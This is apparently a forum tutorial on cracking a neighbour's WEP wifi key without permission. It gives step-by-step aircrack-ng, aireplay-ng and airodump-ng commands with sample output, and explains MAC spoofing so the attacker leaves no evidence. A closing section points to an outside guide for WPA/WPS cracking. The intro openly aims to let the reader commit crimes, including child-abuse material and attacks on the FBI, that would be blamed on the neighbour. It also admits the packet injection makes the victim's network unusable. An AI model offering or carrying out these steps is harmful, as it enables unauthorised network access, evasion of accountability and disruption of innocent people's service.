This tutorial will teach you how to crack and connect to any wifi that is secure

d with WEP security or WPA with the WPS feature enabled. This will make it look
like your neighbor was the one jacking off to kiddie porn, buying drugs, and mou
nting dos attacks against the FBI's servers. I will also teach you how to spoof
your mac address -- this will prevent someone with access to the router you are
connecting to from figuring out who you are. I will be assuming that all of you
are running some linux distro.
#################~Mac address spoofing~###################
This is an essential step in connecting to somone else's wifi. If you follow the
se steps there will be no evidence proving that you were the one connected to th
e network.
type:
sudo ifconfig wlan0 down
sudo macchanger -r wlan0
sudo ifconfig wlan0 up
This is what it looks like when I do it:
blargh@Blargh-D:~$ sudo ifconfig wlan0 down
[sudo] password for blargh:
blargh@Blargh-D:~$ sudo macchanger -r wlan0
Permanent MAC: 8c:a9:82:12:a0:c4 (Intel Corporate)
Current MAC: 8c:a9:82:12:a0:c4 (Intel Corporate)
New MAC: ca:fb:86:d3:68:c5 (unknown)
blargh@Blargh-D:~$ sudo ifconfig wlan0 up
If it gives you some bullshit wlan0: ERROR while getting interface flags: No such
device
do this:
sudo airmon-ng
for me this gives:
Code: Select all
Interface Chipset Driver
wlan0 Unknown iwlwifi [phy0]
just substitute your interface for wlan0 in the previous steps if it gives you t
he aforementioned no such device error.
You may need to install something. To do this type:
sudo apt-get install <the shit that you need to install>
doing ifconfig wlan0 down and then bringing it back up again will probably disco
nnect you from whatever you are already connected to, so you may want to reconne
ct.
####################~Breaking WEP secured wifi~######################
Step one: read my stuff about spoofing your mac address -- you don't want to get
butt raped in prison
type:
sudo ifconfig wlan0 down
sudo airodump-ng wlan0
the second command will start to print out a bunch of fun information about all
the wifi networks in range. Here is what it looks like for me:
Code: Select all
CH 1 ][ Elapsed: 32 s ][ 2013-08-24 01:02



BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ES
SID


00:18:01:FF:1C:C0 -70 114 5 0 6 54e. WEP WEP th
ese
00:1F:33:E4:5F:48 -79 46 0 0 6 54e. WPA2 CCMP PSK es
sids
00:26:B8:99:F2:BF -81 45 2 0 11 54e. WEP WEP ar
e
74:44:01:5A:01:25 -82 14 1 0 1 54e WPA2 CCMP PSK bu
llShit
A0:21:B7:73:B6:5F -83 25 7 3 1 54e WPA2 CCMP PSK an
d
36:46:9A:00:1C:BC -86 11 0 0 3 54e. WPA2 CCMP PSK th
e
00:1F:90:E0:F3:C8 -85 13 1 0 6 54e. WEP WEP bs
sids
30:46:9A:00:1C:BC -86 11 0 0 3 54e. WPA2 CCMP PSK ar
e
00:13:46:D2:38:06 -88 17 0 0 6 54 . WPA TKIP PSK fa
ke
00:7F:28:CA:87:99 -88 6 0 0 11 54e. WPA2 CCMP PSK Fu
ckThePolice


BSSID STATION PWR Rate Lost Packets Probes


00:18:01:FF:1C:C0 F0:6B:CA:13:1D:07 -49 0 - 6 0 1
A0:21:B7:73:B6:5F 74:44:01:5A:01:24 -81 0 - 1e 0 7
(not associated) 00:1C:10:E7:E5:3B -83 0 - 1 0 2
Hit ctrl + c when you see a WEP secured network that you want to attack. Now we
need to capture a whole bunch of information about that network and put it in a
file.
Type:
sudo airodump-ng -c <channel> -w <file name> --bssid <BSSID> wlan0
It will then look like this:
Code: Select all
CH 3 ][ Elapsed: 1 s ][ 2013-08-24 01:47 ][ fixed channel wlan0: -1


BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUT
H E


00:18:01:FF:1C:C0 -77 10 6 0 0 6 54e. WEP WEP
3


BSSID STATION PWR Rate Lost Packets Probes
You will need to wait a while for this to do its work. While you are waiting ope
n a second terminal and do:
sudo aireplay-ng -1 0 -a <BSSID> -h 00:11:22:33:44:55 -e <ESSID> wlan0
you should get a reasuring Association successful message within a few seconds.
Now do:
sudo aireplay-ng -3 -b <BSSID> -h 00:11:22:33:44:55 wlan0
This will create a metric shit ton of traffic on the target network and speed up
your attack. It creates so much traffic that the network will be un-usable whil
e it is running. After a few minutes your terminal will go bat shit insane displ
aying read write packets. You need to wait for the #Data column of the first com
mand prompt to go above 10,000 or so. You may need more than 10k, but 10,000 has
been enough most of the time I've done it. You should get up take a walk, liste
n to music, and have sex while you are waiting for this to happen. It may take a
while, depending on the signal strength.
Now it is time to run the crack itself. Type:
sudo aircrack-ng -b <BSSID> <file name-01.cap>
obviously .cap is a file extension and file name is the file name you chose earl
ier. You can always look in you home directory and look at the file.
If everything works correctly the aformetioned command should yield a result loo
king something like this:
Code: Select all
Opening fuckThePoliece-01.cap
Attack will be restarted every 5000 captured ivs
Starting PTW attack with 72370 ivs
KEY FOUND! [ B2:69:20:1E:CC ]
Decrypted correctly: 100%
You can use the stuff following "KEY FOUND!" (without the square brackets obviou
sly) as the password when connecting to the wifi.
########################~WPA with WPS enabled~######################
The WEP instructions took longer to write than I thought they would and I don't
feel like writing anymore. Here is a link to a tutorial I found with a google se
arch:
http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-re
aver
It is intended for backtrack linux, but you could easily install the necessary p
ackages on any distro. I may come back in the future and edit this with a person
ally written tutorial for WPA, but right now lazyness is king.